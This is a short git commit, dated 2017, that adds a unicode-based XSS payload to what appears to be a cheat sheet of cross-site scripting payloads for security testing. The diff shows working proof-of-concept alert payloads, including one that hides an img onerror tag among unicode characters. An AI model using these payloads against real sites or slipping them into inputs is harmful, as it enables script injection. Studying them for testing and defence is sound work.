Add unicode XSS payload.

This commit is contained in:
EdOverflow 2017-08-28 16:36:49 +02:00
parent f0396aa116
commit 2842feec7b

View file

@ -116,6 +116,12 @@ XSS[JavaScript:alert(1)]
__ javascript:alert(document.domain)
```
**Unicode characters**
```html
†‡•img src=a onerror=javascript:alert('hacked')>…‰€
```
**AngularJS Template Injection based XSS**
*For manual verification on a live target, use `angular.version` in your browser console*